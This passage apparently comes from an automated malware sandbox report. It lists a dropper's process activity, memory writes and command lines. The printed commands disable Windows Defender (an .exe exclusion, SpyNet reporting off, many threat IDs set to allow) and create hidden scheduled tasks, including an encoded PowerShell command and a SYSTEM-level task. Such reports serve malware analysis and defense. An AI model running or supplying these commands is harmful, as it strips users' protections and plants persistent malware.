N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4700 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe
PID 4700 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe
PID 4700 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe
PID 1360 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1360 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1360 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1360 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1360 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1360 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2684 wrote to memory of 1520 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 1520 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2684 wrote to memory of 1520 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4852 wrote to memory of 1396 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4852 wrote to memory of 1396 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4852 wrote to memory of 1396 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1520 wrote to memory of 4920 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1520 wrote to memory of 4920 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1520 wrote to memory of 4920 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4204 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4204 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4204 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1520 wrote to memory of 3292 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1520 wrote to memory of 3292 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1520 wrote to memory of 3292 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1360 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1360 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1360 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1360 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1360 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1360 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3648 wrote to memory of 4312 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 3648 wrote to memory of 4312 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 1360 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1360 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1360 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1360 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1360 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1360 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1320 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\FgUeXjG.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1320 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\FgUeXjG.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1320 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\FgUeXjG.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4852 wrote to memory of 4760 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4852 wrote to memory of 4760 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4852 wrote to memory of 4760 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4852 wrote to memory of 1864 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4852 wrote to memory of 1864 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4852 wrote to memory of 1864 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4852 wrote to memory of 2296 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4852 wrote to memory of 2296 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4852 wrote to memory of 2296 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4852 wrote to memory of 4396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4852 wrote to memory of 4396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4852 wrote to memory of 4396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4852 wrote to memory of 3784 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4852 wrote to memory of 3784 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4852 wrote to memory of 3784 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4852 wrote to memory of 3392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4852 wrote to memory of 3392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe

"C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe

.\Install.exe /XodidE "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gZLUeYHcC" /SC once /ST 06:20:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gZLUeYHcC"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gZLUeYHcC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bCAdHbOFiqtMCRhbmR" /SC once /ST 10:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\FgUeXjG.exe\" hl /Vjsite_idFwG 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\FgUeXjG.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\FgUeXjG.exe hl /Vjsite_idFwG 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

